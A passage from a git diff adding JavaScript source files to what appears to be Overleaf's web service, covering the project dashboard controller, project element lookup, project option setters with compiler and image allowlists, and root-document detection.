GetProjectsRequest, GetProjectsResponse, AllUsersProjects, MongoProject } from "./types" + * @import { ProjectApi, Filters, Page, Sort } from "../../../../types/project/dashboard/api" + * @import { Tag } from "../Tags/types" + */ + +const _ssoAvailable = (affiliation, session, linkedInstitutionIds) => { + if (!affiliation.institution) return false + + // institution.confirmed is for the domain being confirmed, not the email + // Do not show SSO UI for unconfirmed domains + if (!affiliation.institution.confirmed) return false + + // Could have multiple emails at the same institution, and if any are + // linked to the institution then do not show notification for others + if ( + linkedInstitutionIds.indexOf(affiliation.institution.id.toString()) === -1 + ) { + if (affiliation.institution.ssoEnabled) return true + if (affiliation.institution.ssoBeta && session.samlBeta) return true + return false + } + return false +} + +const _buildPortalTemplatesList = affiliations => { + if (affiliations == null) { + affiliations = [] + } + + const portalTemplates = [] + const uniqueAffiliations = _.uniqBy(affiliations, 'institution.id') + for (const aff of uniqueAffiliations) { + const hasSlug = aff.portal?.slug + const hasTemplates = aff.portal?.templates_count > 0 + + if (hasSlug && hasTemplates) { + const portalPath = aff.institution.isUniversity ? '/edu/' : '/org/' + const portalTemplateURL = Settings.siteUrl + portalPath + aff.portal?.slug + + portalTemplates.push({ + name: aff.institution.name, + url: portalTemplateURL, + }) + } + } + return portalTemplates +} + +function cleanupSession(req) { + // cleanup redirects at the end of the redirect chain + delete req.session.postCheckoutRedirect + delete req.session.postLoginRedirect + delete req.session.postOnboardingRedirect + + // cleanup details from register page + delete req.session.sharedProjectData + delete req.session.templateData +} + +/** + * @param {import("express").Request} req + * @param {import("express").Response} res + * @param {import("express").NextFunction} next + * @returns {Promise<void>} + */ +async function projectListPage(req, res, next) { + cleanupSession(req) + + // can have two values: + // - undefined - when there's no "saas" feature or couldn't get subscription data + // - object - the subscription data object + let usersBestSubscription + let survey + let userIsMemberOfGroupSubscription = false + let groupSubscriptionsPendingEnrollment = [] + + const isSaas = Features.hasFeature('saas') + + const userId = SessionManager.getLoggedInUserId(req.session) + const projectsBlobPending = _getProjects(userId).catch(err => { + logger.err({ err, userId }, 'projects listing in background failed') + return undefined + }) + const user = await User.findById( + userId, + `email emails features alphaProgram betaProgram lastPrimaryEmailCheck signUpDate refProviders${ + isSaas ? ' enrollment writefull completedTutorials' : '' + }` + ) + + // Handle case of deleted user + if (user == null) { + UserController.logout(req, res, next) + return + } + + user.refProviders = _.mapValues(user.refProviders, Boolean) + + if (isSaas) { + await SplitTestSessionHandler.promises.sessionMaintenance(req, user) + + try { + usersBestSubscription = + await SubscriptionViewModelBuilder.promises.getBestSubscription({ + _id: userId, + }) + } catch (error) { + logger.err( + { err: error, userId }, + "Failed to get user's best subscription" + ) + } + try { + const { isMember, subscriptions } = + await LimitationsManager.promises.userIsMemberOfGroupSubscription(user) + + userIsMemberOfGroupSubscription = isMember + + // TODO use helper function + if (!user.enrollment?.managedBy) { + groupSubscriptionsPendingEnrollment = subscriptions.filter( + subscription => + subscription.groupPlan && subscription.managedUsersEnabled + ) + } + } catch (error) { + logger.error( + { err: error }, + 'Failed to check whether user is a member of group subscription' + ) + } + + try { + survey = await SurveyHandler.promises.getSurvey(userId) + } catch (error) { + logger.err({ err: error, userId }, 'Failed to load the active survey') + } + + if (user && UserPrimaryEmailCheckHandler.requiresPrimaryEmailCheck(user)) { + return res.redirect('/user/emails/primary-email-check') + } + } + + const tags = await TagsHandler.promises.getAllTags(userId) + + let userEmailsData = { list: [], allInReconfirmNotificationPeriods: [] } + + try { + const fullEmails = await UserGetter.promises.getUserFullEmails(userId) + + if (!Features.hasFeature('affiliations')) { + userEmailsData.list = fullEmails + } else { + try { + const results = await Modules.promises.hooks.fire( + 'allInReconfirmNotificationPeriodsForUser', + fullEmails + ) + + const allInReconfirmNotificationPeriods = (results && results[0]) || [] + + userEmailsData = { + list: fullEmails, + allInReconfirmNotificationPeriods, + } + } catch (error) { + userEmailsData = error + } + } + } catch (error) { + if (!(error instanceof V1ConnectionError)) { + logger.error({ err: error, userId }, 'Failed to get user full emails') + } + } + + const userEmails = userEmailsData.list || [] + + const userAffiliations = userEmails + .filter(emailData => !!emailData.affiliation) + .map(emailData => { + const result = emailData.affiliation + result.email = emailData.email + return result + }) + + const portalTemplates = _buildPortalTemplatesList(userAffiliations) + + const { allInReconfirmNotificationPeriods } = userEmailsData + + const notifications = + await NotificationsHandler.promises.getUserNotifications(userId) + + for (const notification of notifications) { + notification.html = req.i18n.translate( + notification.templateKey, + notification.messageOpts + ) + } + + const notificationsInstitution = [] + // Institution and group SSO Notifications + let groupSsoSetupSuccess + let reconfirmedViaSAML + if (Features.hasFeature('saml')) { + reconfirmedViaSAML = _.get(req.session, ['saml', 'reconfirmed']) + const samlSession = req.session.saml + // Notification: SSO Available + const linkedInstitutionIds = [] + userEmails.forEach(email => { + if (email.samlProviderId) { + linkedInstitutionIds.push(email.samlProviderId) + } + }) + if (Array.isArray(userAffiliations)) { + userAffiliations.forEach(affiliation => { + if (_ssoAvailable(affiliation, req.session, linkedInstitutionIds)) { + notificationsInstitution.push({ + email: affiliation.email, + institutionId: affiliation.institution.id, + institutionName: affiliation.institution.name, + templateKey: 'notification_institution_sso_available', + }) + } + }) + } + + if (samlSession) { + // Notification institution SSO: After SSO Linked + if (samlSession.linked) { + notificationsInstitution.push({ + email: samlSession.institutionEmail, + institutionName: + samlSession.linked.universityName || + samlSession.linked.providerName, + templateKey: 'notification_institution_sso_linked', + }) + } + + // Notification group SSO: After SSO Linked + if (samlSession.linkedGroup) { + groupSsoSetupSuccess = true + } + + // Notification institution SSO: After SSO Linked or Logging in + // The requested email does not match primary email returned from + // the institution + if ( + samlSession.requestedEmail && + samlSession.emailNonCanonical && + !samlSession.error + ) { + notificationsInstitution.push({ + institutionEmail: samlSession.emailNonCanonical, + requestedEmail: samlSession.requestedEmail, + templateKey: 'notification_institution_sso_non_canonical', + }) + } + + // Notification institution SSO: Tried to register, but account already existed + // registerIntercept is set before the institution callback. + // institutionEmail is set after institution callback. + // Check for both in case SSO flow was abandoned + if ( + samlSession.registerIntercept && + samlSession.institutionEmail && + !samlSession.error + ) { + notificationsInstitution.push({ + email: samlSession.institutionEmail, + templateKey: 'notification_institution_sso_already_registered', + }) + } + + // Notification: When there is a session error + if (samlSession.error) { + notificationsInstitution.push({ + templateKey: 'notification_institution_sso_error', + error: samlSession.error, + }) + } + } + delete req.session.saml + } + + function fakeDelay() { + return new Promise(resolve => { + setTimeout(() => resolve(undefined), 0) + }) + } + + const prefetchedProjectsBlob = await Promise.race([ + projectsBlobPending, + fakeDelay(), + ]) + Metrics.inc('project-list-prefetch-projects', 1, { + status: prefetchedProjectsBlob ? 'success' : 'too-slow', + }) + + // in v2 add notifications for matching university IPs + if (Settings.overleaf != null && req.ip !== user.lastLoginIp) { + try { + await NotificationsBuilder.promises + .ipMatcherAffiliation(user._id) + .create(req.ip) + } catch (err) { + logger.error( + { err }, + 'failed to create institutional IP match notification' + ) + } + } + + const hasPaidAffiliation = userAffiliations.some( + affiliation => affiliation.licence && affiliation.licence !== 'free' + ) + + const inactiveTutorials = TutorialHandler.getInactiveTutorials(user) + + const usGovBannerHooksResponse = await Modules.promises.hooks.fire( + 'getUSGovBanner', + userEmails, + hasPaidAffiliation, + inactiveTutorials + ) + + const usGovBanner = (usGovBannerHooksResponse && + usGovBannerHooksResponse[0]) || { + showUSGovBanner: false, + usGovBannerVariant: null, + } + + const { showUSGovBanner, usGovBannerVariant } = usGovBanner + + const showGroupsAndEnterpriseBanner = + Features.hasFeature('saas') && + !showUSGovBanner && + !userIsMemberOfGroupSubscription && + !hasPaidAffiliation + + const groupsAndEnterpriseBannerVariant = + showGroupsAndEnterpriseBanner && + _.sample(['on-premise', 'FOMO', 'FOMO', 'FOMO']) + + let showInrGeoBanner = false + let showBrlGeoBanner = false + let showLATAMBanner = false + let recommendedCurrency + + if ( + usersBestSubscription?.type === 'free' || + usersBestSubscription?.type === 'standalone-ai-add-on' + ) { + const { countryCode, currencyCode } = + await GeoIpLookup.promises.getCurrencyCode(req.ip) + + if (countryCode === 'IN') { + showInrGeoBanner = true + } + showBrlGeoBanner = countryCode === 'BR' + + showLATAMBanner = ['MX', 'CO', 'CL', 'PE'].includes(countryCode) + // LATAM Banner needs to know which currency to display + if (showLATAMBanner) { + recommendedCurrency = currencyCode + } + } + + let hasIndividualRecurlySubscription = false + + try { + const individualSubscription = + await SubscriptionLocator.promises.getUsersSubscription(userId) + + hasIndividualRecurlySubscription = + individualSubscription?.groupPlan === false && + individualSubscription?.recurlyStatus?.state !== 'canceled' && + individualSubscription?.recurlySubscription_id !== '' + } catch (error) { + logger.error({ err: error }, 'Failed to get individual subscription') + } + + // Get the user's assignment for the DS unified nav split test, which + // populates splitTestVariants with a value for the split test name and allows + // Pug to send it to the browser + await SplitTestHandler.promises.getAssignment( + req, + res, + 'sidebar-navigation-ui-update' + ) + + // Get the user's assignment for the papers notification banner split test, + // which populates splitTestVariants with a value for the split test name and + // allows Pug to send it to the browser + await SplitTestHandler.promises.getAssignment( + req, + res, + 'papers-notification-banner' + ) + + res.render('project/list-react', { + title: 'your_projects', + usersBestSubscription, + notifications, + notificationsInstitution, + user, + userAffiliations, + userEmails, + reconfirmedViaSAML, + allInReconfirmNotificationPeriods, + survey, + tags, + portalTemplates, + prefetchedProjectsBlob, + showGroupsAndEnterpriseBanner, + groupsAndEnterpriseBannerVariant, + showUSGovBanner, + usGovBannerVariant, + showLATAMBanner, + recommendedCurrency, + showInrGeoBanner, + showBrlGeoBanner, + projectDashboardReact: true, // used in navbar + groupSsoSetupSuccess, + groupSubscriptionsPendingEnrollment: + groupSubscriptionsPendingEnrollment.map(subscription => ({ + groupId: subscription._id, + groupName: subscription.teamName, + })), + hasIndividualRecurlySubscription, + userRestrictions: Array.from(req.userRestrictions || []), + }) +} + +/** + * Load user's projects with pagination, sorting and filters + * + * @param {GetProjectsRequest} req the request + * @param {GetProjectsResponse} res the response + * @returns {Promise<void>} + */ +async function getProjectsJson(req, res) { + const { filters, page, sort } = req.body + const userId = SessionManager.getLoggedInUserId(req.session) + const projectsPage = await _getProjects(userId, filters, sort, page) + res.json(projectsPage) +} + +/** + * @param {string} userId + * @param {Filters} filters + * @param {Sort} sort + * @param {Page} page + * @returns {Promise<{totalSize: number, projects: ProjectApi[]}>} + * @private + */ +async function _getProjects( + userId, + filters = {}, + sort = { by: 'lastUpdated', order: 'desc' }, + page = { size: 20 } +) { + const [ + /** @type {AllUsersProjects} **/ allProjects, + /** @type {Tag[]} **/ tags, + ] = await Promise.all([ + ProjectGetter.promises.findAllUsersProjects( + userId, + 'name lastUpdated lastUpdatedBy publicAccesLevel archived trashed owner_ref tokens' + ), + TagsHandler.promises.getAllTags(userId), + ]) + const formattedProjects = _formatProjects(allProjects, userId) + const filteredProjects = _applyFilters( + formattedProjects, + tags, + filters, + userId + ) + const pagedProjects = _sortAndPaginate(filteredProjects, sort, page) + + await _injectProjectUsers(pagedProjects) + + return { + totalSize: filteredProjects.length, + projects: pagedProjects, + } +} + +/** + * @param {AllUsersProjects} projects + * @param {string} userId + * @returns {Project[]} + * @private + */ +function _formatProjects(projects, userId) { + const { + owned, + review, + readAndWrite, + readOnly, + tokenReadAndWrite, + tokenReadOnly, + } = projects + + const formattedProjects = /** @type {Project[]} **/ [] + for (const project of owned) { + formattedProjects.push( + _formatProjectInfo(project, 'owner', Sources.OWNER, userId) + ) + } + // Invite-access + for (const project of readAndWrite) { + formattedProjects.push( + _formatProjectInfo(project, 'readWrite', Sources.INVITE, userId) + ) + } + for (const project of review) { + formattedProjects.push( + _formatProjectInfo(project, 'review', Sources.INVITE, userId) + ) + } + for (const project of readOnly) { + formattedProjects.push( + _formatProjectInfo(project, 'readOnly', Sources.INVITE, userId) + ) + } + // Token-access + // Only add these formattedProjects if they're not already present, this gives us cascading access + // from 'owner' => 'token-read-only' + for (const project of tokenReadAndWrite) { + if (!formattedProjects.some(p => p.id === project._id.toString())) { + formattedProjects.push( + _formatProjectInfo(project, 'readAndWrite', Sources.TOKEN, userId) + ) + } + } + for (const project of tokenReadOnly) { + if (!formattedProjects.some(p => p.id === project._id.toString())) { + formattedProjects.push( + _formatProjectInfo(project, 'readOnly', Sources.TOKEN, userId) + ) + } + } + + return formattedProjects +} + +/** + * @param {Project[]} projects + * @param {Tag[]} tags + * @param {Filters} filters + * @param {string} userId + * @returns {Project[]} + * @private + */ +function _applyFilters(projects, tags, filters, userId) { + if (!_hasActiveFilter(filters)) { + return projects + } + return projects.filter(project => _matchesFilters(project, tags, filters)) +} + +/** + * @param {Project[]} projects + * @param {Sort} sort + * @param {Page} page + * @returns {Project[]} + * @private + */ +function _sortAndPaginate(projects, sort, page) { + if ( + (sort.by && !['lastUpdated', 'title', 'owner'].includes(sort.by)) || + (sort.order && !['asc', 'desc'].includes(sort.order)) + ) { + throw new OError('Invalid sorting criteria', { sort }) + } + const sortedProjects = _.orderBy( + projects, + [sort.by || 'lastUpdated'], + [sort.order || 'desc'] + ) + // TODO handle pagination + return sortedProjects +} + +/** + * @param {MongoProject} project + * @param {string} accessLevel + * @param {'owner' | 'invite' | 'token'} source + * @param {string} userId + * @returns {object} + * @private + */ +function _formatProjectInfo(project, accessLevel, source, userId) { + const archived = ProjectHelper.isArchived(project, userId) + // If a project is simultaneously trashed and archived, we will consider it archived but not trashed. + const trashed = ProjectHelper.isTrashed(project, userId) && !archived + + const model = { + id: project._id.toString(), + name: project.name, + owner_ref: project.owner_ref, + lastUpdated: project.lastUpdated, + lastUpdatedBy: project.lastUpdatedBy, + accessLevel, + source, + archived, + trashed, + } + if (accessLevel === PrivilegeLevels.READ_ONLY && source === Sources.TOKEN) { + model.owner_ref = null + model.lastUpdatedBy = null + } + return model +} + +/** + * @param {Project[]} projects + * @returns {Promise<void>} + * @private + */ +async function _injectProjectUsers(projects) { + const userIds = new Set() + for (const project of projects) { + if (project.owner_ref != null) { + userIds.add(project.owner_ref.toString()) + } + if (project.lastUpdatedBy != null) { + userIds.add(project.lastUpdatedBy.toString()) + } + } + + const projection = { + first_name: 1, + last_name: 1, + email: 1, + } + const users = {} + for (const user of await UserGetter.promises.getUsers(userIds, projection)) { + const userId = user._id.toString() + users[userId] = { + id: userId, + email: user.email, + firstName: user.first_name, + lastName: user.last_name, + } + } + for (const project of projects) { + if (project.owner_ref != null) { + project.owner = users[project.owner_ref.toString()] + } + if (project.lastUpdatedBy != null) { + project.lastUpdatedBy = users[project.lastUpdatedBy.toString()] || null + } + + delete project.owner_ref + } +} + +/** + * @param {any} project + * @param {Tag[]} tags + * @param {Filters} filters + * @private + */ +function _matchesFilters(project, tags, filters) { + if (filters.ownedByUser && project.accessLevel !== 'owner') { + return false + } + if (filters.sharedWithUser && project.accessLevel === 'owner') { + return false + } + if (filters.archived && !project.archived) { + return false + } + if (filters.trashed && !project.trashed) { + return false + } + if ( + filters.tag && + !_.find( + tags, + tag => + filters.tag === tag.name && (tag.project_ids || []).includes(project.id) + ) + ) { + return false + } + if ( + filters.search?.length && + project.name.toLowerCase().indexOf(filters.search.toLowerCase()) === -1 + ) { + return false + } + return true +} + +/** + * @param {Filters} filters + * @returns {boolean} + * @private + */ +function _hasActiveFilter(filters) { + return ( + filters.ownedByUser || + filters.sharedWithUser || + filters.archived || + filters.trashed || + filters.tag === null || + filters.tag?.length || + filters.search?.length + ) +} + +export default { + projectListPage: expressify(projectListPage), + getProjectsJson: expressify(getProjectsJson), +} diff --git a/services/web/app/src/Features/Project/ProjectLocator.js b/services/web/app/src/Features/Project/ProjectLocator.js new file mode 100644 index 0000000..2feaa0c --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectLocator.js @@ -0,0 +1,351 @@ +const _ = require('lodash') +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const async = require('async') +const ProjectGetter = require('./ProjectGetter') +const Errors = require('../Errors/Errors') +const { promisifyMultiResult } = require('@overleaf/promise-utils') +const { iterablePaths } = require('./IterablePath') + +/** + * @param project + * @param predicate + * @returns {{path: string, value: *}} + */ +function findDeep(project, predicate) { + function find(value, path) { + if (predicate(value)) { + return { value, path: path.join('.') } + } + if (typeof value === 'object' && value !== null) { + for (const [childKey, childVal] of Object.entries(value)) { + const found = find(childVal, [...path, childKey]) + if (found) { + return found + } + } + } + } + return find(project.rootFolder, ['rootFolder']) +} + +function findElement(options, _callback) { + // The search algorithm below potentially invokes the callback multiple + // times. + const callback = _.once(_callback) + + const { + project, + project_id: projectId, + element_id: elementId, + type, + } = options + const elementType = sanitizeTypeOfElement(type) + + let count = 0 + const endOfBranch = function () { + if (--count === 0) { + logger.warn( + `element ${elementId} could not be found for project ${ + projectId || project._id + }` + ) + callback(new Errors.NotFoundError('entity not found')) + } + } + + function search(searchFolder, path) { + count++ + const element = _.find( + searchFolder[elementType], + el => (el != null ? el._id : undefined) + '' === elementId + '' + ) // need to ToString both id's for robustness + if ( + element == null && + searchFolder.folders != null && + searchFolder.folders.length !== 0 + ) { + _.forEach(searchFolder.folders, (folder, index) => { + if (folder == null) { + return + } + const newPath = {} + for (const key of Object.keys(path)) { + const value = path[key] + newPath[key] = value + } // make a value copy of the string + newPath.fileSystem += `/${folder.name}` + newPath.mongo += `.folders.${index}` + search(folder, newPath) + }) + endOfBranch() + } else if (element != null) { + const elementPlaceInArray = getIndexOf( + searchFolder[elementType], + elementId + ) + path.fileSystem += `/${element.name}` + path.mongo += `.${elementType}.${elementPlaceInArray}` + callback(null, element, path, searchFolder) + } else if (element == null) { + endOfBranch() + } + } + + const path = { fileSystem: '', mongo: 'rootFolder.0' } + + const startSearch = project => { + if (elementId + '' === project.rootFolder[0]._id + '') { + callback(null, project.rootFolder[0], path, null) + } else { + search(project.rootFolder[0], path) + } + } + + if (project != null) { + startSearch(project) + } else { + ProjectGetter.getProject( + projectId, + { rootFolder: true, rootDoc_id: true }, + (err, project) => { + if (err != null) { + return callback(err) + } + if (project == null) { + return callback(new Errors.NotFoundError('project not found')) + } + startSearch(project) + } + ) + } +} + +function findRootDoc(opts, callback) { + const getRootDoc = project => { + if (project.rootDoc_id != null) { + findElement( + { project, element_id: project.rootDoc_id, type: 'docs' }, + (error, ...args) => { + if (error != null) { + if (error instanceof Errors.NotFoundError) { + return callback(null, null) + } else { + return callback(error) + } + } + callback(null, ...args) + } + ) + } else { + callback(null, null) + } + } + const { project, project_id: projectId } = opts + if (project != null) { + getRootDoc(project) + } else { + ProjectGetter.getProject( + projectId, + { rootFolder: true, rootDoc_id: true }, + (err, project) => { + if (err != null) { + logger.warn({ err }, 'error getting project') + callback(err) + } else { + getRootDoc(project) + } + } + ) + } +} + +function findElementByPath(options, callback) { + const { project, project_id: projectId, path, exactCaseMatch } = options + if (path == null) { + return new Error('no path provided for findElementByPath') + } + + if (project != null) { + _findElementByPathWithProject(project, path, exactCaseMatch, callback) + } else { + ProjectGetter.getProject( + projectId, + { rootFolder: true, rootDoc_id: true }, + (err, project) => { + if (err != null) { + return callback(err) + } + _findElementByPathWithProject(project, path, exactCaseMatch, callback) + } + ) + } +} + +function _findElementByPathWithProject( + project, + needlePath, + exactCaseMatch, + callback +) { + let matchFn + if (exactCaseMatch) { + matchFn = (a, b) => a === b + } else { + matchFn = (a, b) => + (a != null ? a.toLowerCase() : undefined) === + (b != null ? b.toLowerCase() : undefined) + } + + function getParentFolder(haystackFolder, foldersList, level, cb) { + if (foldersList.length === 0) { + return cb(null, haystackFolder) + } + const needleFolderName = foldersList[level] + let found = false + for (const folder of haystackFolder.folders) { + if (matchFn(folder.name, needleFolderName)) { + found = true + if (level === foldersList.length - 1) { + return cb(null, folder) + } else { + return getParentFolder(folder, foldersList, level + 1, cb) + } + } + } + if (!found) { + cb( + new Error( + `not found project: ${project._id} search path: ${needlePath}, folder ${foldersList[level]} could not be found` + ) + ) + } + } + + function getEntity(folder, entityName, cb) { + let result, type + if (entityName == null) { + return cb(null, folder, 'folder', null) + } + for (const file of iterablePaths(folder, 'fileRefs')) { + if (matchFn(file != null ? file.name : undefined, entityName)) { + result = file + type = 'file' + } + } + for (const doc of iterablePaths(folder, 'docs')) { + if (matchFn(doc != null ? doc.name : undefined, entityName)) { + result = doc + type = 'doc' + } + } + for (const childFolder of iterablePaths(folder, 'folders')) { + if ( + matchFn(childFolder != null ? childFolder.name : undefined, entityName) + ) { + result = childFolder + type = 'folder' + } + } + + if (result != null) { + cb(null, result, type, folder) + } else { + cb( + new Error( + `not found project: ${project._id} search path: ${needlePath}, entity ${entityName} could not be found` + ) + ) + } + } + + if (project == null) { + return callback(new Error('Tried to find an element for a null project')) + } + if (needlePath === '' || needlePath === '/') { + return callback(null, project.rootFolder[0], 'folder', null) + } + + if (needlePath.indexOf('/') === 0) { + needlePath = needlePath.substring(1) + } + const foldersList = needlePath.split('/') + const needleName = foldersList.pop() + const rootFolder = project.rootFolder[0] + + const jobs = [] + jobs.push(cb => getParentFolder(rootFolder, foldersList, 0, cb)) + jobs.push((folder, cb) => getEntity(folder, needleName, cb)) + async.waterfall(jobs, callback) +} + +function sanitizeTypeOfElement(elementType) { + const lastChar = elementType.slice(-1) + if (lastChar !== 's') { + elementType += 's' + } + if (elementType === 'files') { + elementType = 'fileRefs' + } + return elementType +} + +function getIndexOf(searchEntity, id) { + const { length } = searchEntity + let count = 0 + while (count < length) { + if ( + (searchEntity[count] != null ? searchEntity[count]._id : undefined) + + '' === + id + '' + ) { + return count + } + count++ + } +} + +/** + * Follow the given Mongo path (as returned by findElement) and return the + * entity at the end of it. + */ +function findElementByMongoPath(project, mongoPath) { + const components = mongoPath.split('.') + let node = project + for (const component of components) { + const key = Array.isArray(node) ? parseInt(component, 10) : component + node = node[key] + if (node == null) { + throw new OError('entity not found', { + projectId: project._id, + mongoPath, + }) + } + } + return node +} + +module.exports = { + findElement, + findElementByPath, + findRootDoc, + findElementByMongoPath, + findDeep, + promises: { + findElement: promisifyMultiResult(findElement, [ + 'element', + 'path', + 'folder', + ]), + findElementByPath: promisifyMultiResult(findElementByPath, [ + 'element', + 'type', + 'folder', + ]), + findRootDoc: promisifyMultiResult(findRootDoc, [ + 'element', + 'path', + 'folder', + ]), + }, +} diff --git a/services/web/app/src/Features/Project/ProjectOptionsHandler.js b/services/web/app/src/Features/Project/ProjectOptionsHandler.js new file mode 100644 index 0000000..5ca89ce --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectOptionsHandler.js @@ -0,0 +1,92 @@ +const { Project } = require('../../models/Project') +const settings = require('@overleaf/settings') +const { callbackify } = require('util') +const { db, ObjectId } = require('../../infrastructure/mongodb') +const safeCompilers = ['xelatex', 'pdflatex', 'latex', 'lualatex'] + +const ProjectOptionsHandler = { + async setCompiler(projectId, compiler) { + if (!compiler) { + return + } + compiler = compiler.toLowerCase() + if (!safeCompilers.includes(compiler)) { + throw new Error(`invalid compiler: ${compiler}`) + } + const conditions = { _id: projectId } + const update = { compiler } + return Project.updateOne(conditions, update, {}) + }, + + async setImageName(projectId, imageName) { + if (!imageName || !Array.isArray(settings.allowedImageNames)) { + return + } + imageName = imageName.toLowerCase() + const isAllowed = settings.allowedImageNames.find( + allowed => imageName === allowed.imageName + ) + if (!isAllowed) { + throw new Error(`invalid imageName: ${imageName}`) + } + const conditions = { _id: projectId } + const update = { imageName: settings.imageRoot + '/' + imageName } + return Project.updateOne(conditions, update, {}) + }, + + async setSpellCheckLanguage(projectId, languageCode) { + if (!Array.isArray(settings.languages)) { + return + } + const language = settings.languages.find( + language => language.code === languageCode + ) + if (languageCode && !language) { + throw new Error(`invalid languageCode: ${languageCode}`) + } + const conditions = { _id: projectId } + const update = { spellCheckLanguage: languageCode } + return Project.updateOne(conditions, update, {}) + }, + + async setBrandVariationId(projectId, brandVariationId) { + if (!brandVariationId) { + return + } + const conditions = { _id: projectId } + const update = { brandVariationId } + return Project.updateOne(conditions, update, {}) + }, + + async unsetBrandVariationId(projectId) { + const conditions = { _id: projectId } + const update = { $unset: { brandVariationId: 1 } } + return Project.updateOne(conditions, update, {}) + }, + + async setHistoryRangesSupport(projectId, enabled) { + const conditions = { _id: new ObjectId(projectId) } + const update = { + $set: { 'overleaf.history.rangesSupportEnabled': enabled }, + } + // NOTE: Updating the Mongoose model with the same query doesn't work. Maybe + // because rangesSupportEnabled is not part of the schema? + return db.projects.updateOne(conditions, update) + }, +} + +module.exports = { + setCompiler: callbackify(ProjectOptionsHandler.setCompiler), + setImageName: callbackify(ProjectOptionsHandler.setImageName), + setSpellCheckLanguage: callbackify( + ProjectOptionsHandler.setSpellCheckLanguage + ), + setBrandVariationId: callbackify(ProjectOptionsHandler.setBrandVariationId), + unsetBrandVariationId: callbackify( + ProjectOptionsHandler.unsetBrandVariationId + ), + setHistoryRangesSupport: callbackify( + ProjectOptionsHandler.setHistoryRangesSupport + ), + promises: ProjectOptionsHandler, +} diff --git a/services/web/app/src/Features/Project/ProjectRootDocManager.js b/services/web/app/src/Features/Project/ProjectRootDocManager.js new file mode 100644 index 0000000..0bac5e3 --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectRootDocManager.js @@ -0,0 +1,341 @@ +/* eslint-disable + n/handle-callback-err, + max-len, + no-unused-vars, + no-useless-escape, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let ProjectRootDocManager +const ProjectEntityHandler = require('./ProjectEntityHandler') +const ProjectEntityUpdateHandler = require('./ProjectEntityUpdateHandler') +const ProjectGetter = require('./ProjectGetter') +const DocumentHelper = require('../Documents/DocumentHelper') +const Path = require('path') +const fs = require('fs') +const async = require('async') +const globby = require('globby') +const _ = require('lodash') +const { promisifyAll } = require('@overleaf/promise-utils') +const logger = require('@overleaf/logger') +const { + BackgroundTaskTracker, +} = require('../../infrastructure/GracefulShutdown') + +const rootDocResets = new BackgroundTaskTracker('root doc resets') + +module.exports = ProjectRootDocManager = { + setRootDocAutomaticallyInBackground(projectId) { + rootDocResets.add() + setTimeout(async () => { + try { + await ProjectRootDocManager.promises.setRootDocAutomatically(projectId) + } catch (err) { + logger.warn( + { err }, + 'failed to set root doc automatically in background' + ) + } finally { + rootDocResets.done() + } + }, 30 * 1000) + }, + + setRootDocAutomatically(projectId, callback) { + if (callback == null) { + callback = function () {} + } + return ProjectEntityHandler.getAllDocs(projectId, function (error, docs) { + if (error != null) { + return callback(error) + } + + const jobs = _.map( + docs, + (doc, path) => + function (cb) { + if ( + ProjectEntityUpdateHandler.isPathValidForRootDoc(path) && + DocumentHelper.contentHasDocumentclass(doc.lines) + ) { + async.setImmediate(function () { + cb(doc._id) + }) + } else { + async.setImmediate(function () { + cb(null) + }) + } + } + ) + + return async.series(jobs, function (rootDocId) { + if (rootDocId != null) { + return ProjectEntityUpdateHandler.setRootDoc( + projectId, + rootDocId, + callback + ) + } else { + return callback() + } + }) + }) + }, + + findRootDocFileFromDirectory(directoryPath, callback) { + if (callback == null) { + callback = function () {} + } + const filePathsPromise = globby(['**/*.{tex,Rtex,Rnw}'], { + cwd: directoryPath, + followSymlinkedDirectories: false, + onlyFiles: true, + case: false, + }) + + // the search order is such that we prefer files closer to the project root, then + // we go by file size in ascending order, because people often have a main + // file that just includes a bunch of other files; then we go by name, in + // order to be deterministic + filePathsPromise.then( + unsortedFiles => + ProjectRootDocManager._sortFileList( + unsortedFiles, + directoryPath, + function (err, files) { + if (err != null) { + return callback(err) + } + let firstFileInRootFolder + let doc = null + + return async.until( + cb => cb(null, doc != null || files.length === 0), + function (cb) { + const file = files.shift() + return fs.readFile( + Path.join(directoryPath, file), + 'utf8', + function (error, content) { + if (error != null) { + return cb(error) + } + content = (content || '').replace(/\r/g, '') + if (DocumentHelper.contentHasDocumentclass(content)) { + doc = { path: file, content } + } + + if (!firstFileInRootFolder && !file.includes('/')) { + firstFileInRootFolder = { path: file, content } + } + cb(null) + } + ) + }, + err => { + if (err) { + return callback(err) + } + + // if no doc was found, use the first file in the root folder as the main doc + if (!doc && firstFileInRootFolder) { + doc = firstFileInRootFolder + } + + callback(null, doc?.path, doc?.content) + } + ) + } + ), + err => callback(err) + ) + + // coffeescript's implicit-return mechanism returns filePathsPromise from this method, which confuses mocha + return null + }, + + setRootDocFromName(projectId, rootDocName, callback) { + if (callback == null) { + callback = function () {} + } + return ProjectEntityHandler.getAllDocPathsFromProjectById( + projectId, + function (error, docPaths) { + let docId, path + if (error != null) { + return callback(error) + } + // strip off leading and trailing quotes from rootDocName + rootDocName = rootDocName.replace(/^\'|\'$/g, '') + // prepend a slash for the root folder if not present + if (rootDocName[0] !== '/') { + rootDocName = `/${rootDocName}` + } + // find the root doc from the filename + let rootDocId = null + for (docId in docPaths) { + // docpaths have a leading / so allow matching "folder/filename" and "/folder/filename" + path = docPaths[docId] + if (path === rootDocName) { + rootDocId = docId + } + } + // try a basename match if there was no match + if (!rootDocId) { + for (docId in docPaths) { + path = docPaths[docId] + if (Path.basename(path) === Path.basename(rootDocName)) { + rootDocId = docId + } + } + } + // set the root doc id if we found a match + if (rootDocId != null) { + return ProjectEntityUpdateHandler.setRootDoc( + projectId, + rootDocId, + callback + ) + } else { + return callback() + } + } + ) + }, + + ensureRootDocumentIsSet(projectId, callback) { + if (callback == null) { + callback = function () {} + } + return ProjectGetter.getProject( + projectId, + { rootDoc_id: 1 }, + function (error, project) { + if (error != null) { + return callback(error) + } + if (project == null) { + return callback(new Error('project not found')) + } + + if (project.rootDoc_id != null) { + return callback() + } else { + return ProjectRootDocManager.setRootDocAutomatically( + projectId, + callback + ) + } + } + ) + }, + + /** + * @param {ObjectId | string} project_id + * @param {Function} callback + */ + 